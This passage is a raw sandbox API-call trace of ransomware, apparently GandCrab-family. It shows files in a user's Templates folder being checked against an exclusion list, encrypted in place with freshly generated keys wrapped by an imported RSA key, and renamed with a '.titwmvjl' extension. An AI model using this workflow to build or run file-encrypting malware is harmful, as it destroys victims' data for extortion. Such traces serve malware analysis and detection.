param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx.titwmvjl") returned 114 [0079.307] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0079.307] lstrlenW (lpString=".xltx") returned 5 [0079.307] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.307] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltx ") returned 6 [0079.307] lstrcmpiW (lpString1=".xltx", lpString2=".titwmvjl") returned 1 [0079.307] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.307] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0079.307] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0079.307] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="desktop.ini") returned 1 [0079.307] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="autorun.inf") returned 1 [0079.307] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="ntuser.dat") returned 1 [0079.307] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="iconcache.db") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="bootsect.bak") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="boot.ini") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="ntuser.dat.log") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="thumbs.db") returned -1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="KRAB-DECRYPT.html") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="CRAB-DECRYPT.html") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="ntldr") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="NTDETECT.COM") returned 1 [0079.308] lstrcmpiW (lpString1="Process Map for Cross-Functional Flowchart.xltx", lpString2="Bootfont.bin") returned 1 [0079.308] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx") returned 105 [0079.308] lstrlenW (lpString=".xltx") returned 5 [0079.308] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.308] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltx ") returned 6 [0079.308] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.308] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.308] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for cross-functional flowchart.xltx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0079.309] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.309] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.325] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.325] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.325] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.328] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.328] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.328] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.328] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0079.328] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.329] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.329] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.329] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.329] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.332] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.333] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.333] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.333] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0079.333] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.334] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.334] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.334] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.334] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.340] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5037f8) returned 1 [0079.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.340] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.340] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.340] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.341] GetLastError () returned 0x0 [0079.341] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.341] CryptDestroyKey (hKey=0x5037f8) returned 1 [0079.341] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.341] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.341] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.343] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.346] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5035b8) returned 1 [0079.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.346] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.346] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.346] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.346] GetLastError () returned 0x0 [0079.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.347] CryptDestroyKey (hKey=0x5035b8) returned 1 [0079.347] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.347] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.347] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.347] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.347] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x2355e, lpOverlapped=0x0) returned 1 [0079.369] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffdcaa2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.369] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2355e, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x2355e, lpOverlapped=0x0) returned 1 [0079.387] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0079.388] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.392] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.392] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.393] CloseHandle (hObject=0x2c4) returned 1 [0079.395] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for cross-functional flowchart.xltx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Process Map for Cross-Functional Flowchart.xltx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\process map for cross-functional flowchart.xltx.titwmvjl"), dwFlags=0x1) returned 1 [0079.403] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.403] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.403] lstrcmpW (lpString1="Stock symbols comparison.xltm", lpString2=".") returned 1 [0079.403] lstrcmpW (lpString1="Stock symbols comparison.xltm", lpString2="..") returned 1 [0079.403] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="Stock symbols comparison.xltm" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm" [0079.403] lstrlenW (lpString=".titwmvjl") returned 9 [0079.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0079.403] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.403] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm.titwmvjl") returned 96 [0079.403] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0079.403] lstrlenW (lpString=".xltm") returned 5 [0079.403] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.404] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".xltm ") returned 6 [0079.404] lstrcmpiW (lpString1=".xltm", lpString2=".titwmvjl") returned 1 [0079.404] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0079.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="desktop.ini") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="autorun.inf") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="ntuser.dat") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="iconcache.db") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="bootsect.bak") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="boot.ini") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="ntuser.dat.log") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="thumbs.db") returned -1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="KRAB-DECRYPT.html") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="CRAB-DECRYPT.html") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="KRAB-DECRYPT.txt") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="CRAB-DECRYPT.txt") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="ntldr") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="NTDETECT.COM") returned 1 [0079.404] lstrcmpiW (lpString1="Stock symbols comparison.xltm", lpString2="Bootfont.bin") returned 1 [0079.404] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm") returned 87 [0079.404] lstrlenW (lpString=".xltm") returned 5 [0079.404] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.404] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".xltm ") returned 6 [0079.405] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.405] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.405] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\stock symbols comparison.xltm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0079.405] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.405] ReadFile (in: hFile=0x2c4, lpBuffer=0x2630000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0079.422] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.422] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.422] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.425] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.425] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.425] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.425] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0079.425] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.426] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.426] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.426] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.426] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4cdb38) returned 1 [0079.429] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.429] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.429] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.429] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0079.429] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.430] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.430] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.430] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.430] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.433] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034b8) returned 1 [0079.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.433] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.433] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.434] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.434] GetLastError () returned 0x0 [0079.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.434] CryptDestroyKey (hKey=0x5034b8) returned 1 [0079.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.434] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.434] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.434] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4cdb38) returned 1 [0079.437] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.438] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5034b8) returned 1 [0079.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.438] CryptGetKeyParam (in: hKey=0x5034b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0079.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.438] CryptEncrypt (in: hKey=0x5034b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0079.438] GetLastError () returned 0x0 [0079.438] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.439] CryptDestroyKey (hKey=0x5034b8) returned 1 [0079.439] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.439] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.439] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.439] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.439] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x100000, lpOverlapped=0x0) returned 1 [0079.492] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfff00000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.492] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x100000, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x100000, lpOverlapped=0x0) returned 1 [0079.506] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x6438a, lpOverlapped=0x0) returned 1 [0079.515] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfff9bc76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.515] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6438a, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x6438a, lpOverlapped=0x0) returned 1 [0079.518] WriteFile (in: hFile=0x2c4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0079.520] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.525] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.530] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.530] CloseHandle (hObject=0x2c4) returned 1 [0079.623] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\stock symbols comparison.xltm"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\Stock symbols comparison.xltm.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\stock symbols comparison.xltm.titwmvjl"), dwFlags=0x1) returned 1 [0079.624] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.625] FindNextFileW (in: hFindFile=0x503478, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0079.625] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0079.625] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0079.625] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt" [0079.625] lstrlenW (lpString=".titwmvjl") returned 9 [0079.625] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt") returned 78 [0079.625] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.625] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 87 [0079.625] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt") returned 78 [0079.625] lstrlenW (lpString=".txt") returned 4 [0079.625] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.625] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0079.626] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0079.626] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt") returned 78 [0079.626] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\TITWMVJL-DECRYPT.txt") returned 78 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0079.626] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", 